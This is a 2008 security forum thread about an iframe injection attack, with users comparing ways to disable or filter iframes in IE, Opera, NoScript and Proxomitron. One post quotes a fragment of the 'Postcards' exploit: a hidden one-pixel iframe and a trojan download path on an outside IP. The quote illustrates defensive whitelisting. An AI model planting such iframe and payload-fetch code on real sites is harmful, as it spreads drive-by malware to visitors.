Ongoing IFrame attack proving difficult to kill

Discussion in 'malware problems & news' started by ronjor, Mar 18, 2008.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,719
    Location:
    Texas
    Article
     
  2. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Nasty!
     
  3. Rilla927

    Rilla927 Registered Member

    Joined:
    May 12, 2005
    Posts:
    1,710
    I keep iframes disabled through IE. Just curious, would Online Armor detect such a thing?
     
  4. noway

    noway Registered Member

    Joined:
    Apr 24, 2005
    Posts:
    351
  5. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Interesting, I blocked ifames with Noscript and can still see the example in the link. Maybe I am misunderstanding the "foribid iframes" option.

    Edit: Or that is not an iframe, just an example.
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    It,s iframe. see here.
     

    Attached Files:

  7. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,039
    Hi Aigle

    How did you turn them off in Opera

    Pete
     
  8. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Hi Peter, I just tried it today.

    Tools> Prefrences> Advanced> Content> Style Options> tick off Enable inline frames
     
  9. Rilla927

    Rilla927 Registered Member

    Joined:
    May 12, 2005
    Posts:
    1,710
    Thanks for posting the link. Even though I have Iframes disabled in IE for every zone I can still see the frame in your link. How else can this be disabled? What did they put the option there for if it's not going to work when disabled?

    @Aigle

    Where did you get the cool skin & toolbar for Opera?
     
    Last edited: Mar 20, 2008
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Iframe exploits are nothing new, of course, and achieved notoriety as far back at least to 2004 with Banner Ads:

    http://www.secureworks.com/research/threats/iframeads/

    A careful reading of the current article shows that all that has changed is the method of delivering the iframe content
    onto the user's web page. The end results are the same: to deliver a payload.

    Interestingly, the current exploit seems to rely on social engineering:

    More devious are methods employing remote code execution. Sans.org documented one using the MPack tool:

    MPack Analysis
    http://isc.sans.org/diary.html?storyid=3015
    An example of searching for vulerabilities when a user connects to such a page was the Postcards exploit.
    The source code included this:

    Code:
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    
     var Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit="; 
    
    
    The iframe cached another page with five exploits. If one was found, the trojan path above was executed to download exefile.exe.
    This was discussed a while back in the Anti-Executable forum to show how easily these types of remote code
    execution exploits are blocked with White List protection.

    iframe-ae1.gif
    _____________________________________________________

    Currently, the discussions in the LUA and SRP threads would show similar protection.

    Not all Iframes are hostile. The CSMonitor news site uses them to load changing Spotlght stories:

    iframe-csm.gif
    _____________________________________________________

    iframe-csm2.gif
    _____________________________________________________

    Iframes are a useful function, and like many useful functions, they have been mis-used by malware writers.


    ----
    rich
     
    Last edited: Mar 20, 2008
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
  12. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    See attached picture
     

    Attached Files:

  13. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Yes, that is what is ticked, the iframe in the example still appeared.

    Aigle: While I still prefer firefox, Lix is the best skin.
     
  14. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    I think the difference is probably that the iframe in question is not invoking a script making requests on the browser to offset commands internally but it is simply pulling text out of a ".txt" file and as such it is a legitimate iframe and not considered hostile...

    Not all Iframe's are filtered...
     
  15. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    Hi Hermescomputers:

    So you are saying that NoScript does not block all Iframes, but only those that exhibit a specific behavior?
     
  16. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Essentially yes, Iframe by design is a good thing that provide a useful service it is the hostile ones that are identified and filtered out.

    Someone with more "internal" knowledge of the mechanism behind the Noscript Iframe filter should answer this one... I'm not an accomplished coder so the discrimination algorithm isn't my forte...
     
    Last edited: Mar 20, 2008
  17. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I'd guess that NoScript only blocks IFRAMEs which pull executable/interpretable code. If an IFRAME tries to pull plaintext content, it will do nothing. Just my educated guess.
     
  18. noway

    noway Registered Member

    Joined:
    Apr 24, 2005
    Posts:
    351
    I use IE6 + Proxomitron and the filter "iFrame/iLayer to Link" converts them to links. I changed this filter so that the URL Match is ^$LST(IFrameAllow) where the IFrameAllow List is a list of all the sites that I allow I-Frames for.
     
  19. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan

    Are not these two totally diffreent things? :D
     
  20. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    So NoScript is wise. not so dumb in case of iframes?
     
  21. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I guess so.
     
  22. steve161

    steve161 Registered Member

    Joined:
    Nov 22, 2006
    Posts:
    681
    Location:
    New York
    No, I meant I use both. Best looking-advantage Opera w/ Lix. Oh no, a which is the best looking browser thread: CLOSED Now, back to iframes. :D
     
  23. CogitoErgoSum

    CogitoErgoSum Registered Member

    Joined:
    Aug 22, 2005
    Posts:
    641
    Location:
    Cerritos, California
  24. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Doing some more thinking about Iframe filters within Noscript... I think that the dynamic filter only applies to sites on the allow list as sites without permitted scripts would have all Iframes blocked and not only those meeting non hostile criterias...

    Just an educated guess but I think it would be the more logical application to the reasons why some Iframes pass and others are blocked...
     
  25. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,873
    Location:
    SW. Oklahoma

    One problem in unchecking inline frames in Opera is that Gmail no longer opens. The ability to use colored text on several of my other forums is disabled without inline frames. It has been more of a pain with it turned off than the risk of leaving it enabled. At least for me.
     
    Last edited: Mar 21, 2008
Loading...
Thread Status:
Not open for further replies.